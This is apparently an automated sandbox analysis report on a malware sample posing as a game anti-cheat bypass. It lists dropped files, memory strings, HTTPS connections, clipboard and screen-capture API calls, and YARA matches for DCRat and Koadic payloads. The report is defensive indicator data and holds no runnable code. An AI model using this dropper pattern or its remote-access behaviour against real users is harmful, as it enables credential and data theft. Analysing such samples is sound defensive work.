0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001441B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                      Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: Loader.exe.0.drString found in binary or memory: https://www.entrust.net/rpa0
                      Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042E060 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_0042E060
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042E060 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_0042E060
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042E230 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,13_2_0042E230
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71611C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF71611C2F0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161407540_2_00007FF716140754
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161334840_2_00007FF716133484
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612A4AC0_2_00007FF71612A4AC
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71613B1900_2_00007FF71613B190
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716131F200_2_00007FF716131F20
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716115E240_2_00007FF716115E24
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71613CE880_2_00007FF71613CE88
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161249280_2_00007FF716124928
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71611F9300_2_00007FF71611F930
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71614C8380_2_00007FF71614C838
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161148400_2_00007FF716114840
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161525500_2_00007FF716152550
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612B5340_2_00007FF71612B534
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161176C00_2_00007FF7161176C0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161353F00_2_00007FF7161353F0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612F1800_2_00007FF71612F180
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161321D00_2_00007FF7161321D0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161172880_2_00007FF716117288
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612126C0_2_00007FF71612126C
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71611A3100_2_00007FF71611A310
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71611C2F00_2_00007FF71611C2F0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612AF180_2_00007FF71612AF18
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161520800_2_00007FF716152080
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716132D580_2_00007FF716132D58
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161407540_2_00007FF716140754
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716138DF40_2_00007FF716138DF4
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612BB900_2_00007FF71612BB90
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716125B600_2_00007FF716125B60
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716134B980_2_00007FF716134B98
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716148C1C0_2_00007FF716148C1C
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161339640_2_00007FF716133964
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71612C96C0_2_00007FF71612C96C
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161489A00_2_00007FF7161489A0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716121A480_2_00007FF716121A48
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71614FA940_2_00007FF71614FA94
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716111AA40_2_00007FF716111AA4
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716132AB00_2_00007FF716132AB0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716155AF80_2_00007FF716155AF8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D34CE8811_2_00007FF64D34CE88
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D341F2011_2_00007FF64D341F20
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D325E2411_2_00007FF64D325E24
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33492811_2_00007FF64D334928
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D32F93011_2_00007FF64D32F930
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D35075411_2_00007FF64D350754
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D34B19011_2_00007FF64D34B190
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D34348411_2_00007FF64D343484
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33A4AC11_2_00007FF64D33A4AC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33AF1811_2_00007FF64D33AF18
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D342D5811_2_00007FF64D342D58
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D348DF411_2_00007FF64D348DF4
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D35075411_2_00007FF64D350754
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D36208011_2_00007FF64D362080
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D35FA9411_2_00007FF64D35FA94
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D321AA411_2_00007FF64D321AA4
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D342AB011_2_00007FF64D342AB0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D331A4811_2_00007FF64D331A48
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D365AF811_2_00007FF64D365AF8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3589A011_2_00007FF64D3589A0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D34396411_2_00007FF64D343964
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33C96C11_2_00007FF64D33C96C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33BB9011_2_00007FF64D33BB90
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D344B9811_2_00007FF64D344B98
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D335B6011_2_00007FF64D335B60
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D358C1C11_2_00007FF64D358C1C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3276C011_2_00007FF64D3276C0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D36255011_2_00007FF64D362550
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D35C83811_2_00007FF64D35C838
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D32484011_2_00007FF64D324840
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D32728811_2_00007FF64D327288
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33126C11_2_00007FF64D33126C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D32A31011_2_00007FF64D32A310
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D32C2F011_2_00007FF64D32C2F0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33F18011_2_00007FF64D33F180
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3421D011_2_00007FF64D3421D0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D33B53411_2_00007FF64D33B534
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3453F011_2_00007FF64D3453F0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1E06E12_2_00A1E06E
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1636412_2_00A16364
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A2844812_2_00A28448
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1E52B12_2_00A1E52B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009CC6CD12_2_009CC6CD
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009CE67012_2_009CE670
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FC73312_2_009FC733
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FE95812_2_009FE958
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FA95812_2_009FA958
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009DCB1F12_2_009DCB1F
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FCC3812_2_009FCC38
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009D0C5A12_2_009D0C5A
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009DAEF812_2_009DAEF8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A20E0D12_2_00A20E0D
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009D0FA212_2_009D0FA2
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1AF5812_2_00A1AF58
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A2B09812_2_00A2B098
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FB32812_2_009FB328
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1B45812_2_00A1B458
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1D5E312_2_00A1D5E3
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009E368212_2_009E3682
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A1764812_2_00A17648
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009C98A012_2_009C98A0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A2F82812_2_00A2F828
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FB93812_2_009FB938
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A0594812_2_00A05948
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A2FAE812_2_00A2FAE8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009F9B7812_2_009F9B78
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00A2FDF812_2_00A2FDF8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009F9F3812_2_009F9F38
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009FBF5812_2_009FBF58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043983013_2_00439830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041F30913_2_0041F309
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040533013_2_00405330
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00420D8C13_2_00420D8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042165013_2_00421650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416EEE13_2_00416EEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00401F5013_2_00401F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00415F7D13_2_00415F7D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042007313_2_00420073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042807613_2_00428076
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004350A013_2_004350A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040594013_2_00405940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F95013_2_0040F950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040615713_2_00406157
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040896013_2_00408960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043817013_2_00438170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040127813_2_00401278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00422A7B13_2_00422A7B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004072C013_2_004072C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00439AF013_2_00439AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00403B8013_2_00403B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00406C4013_2_00406C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040644A13_2_0040644A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043245013_2_00432450
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041DC5C13_2_0041DC5C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042546013_2_00425460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00437CA013_2_00437CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042853313_2_00428533
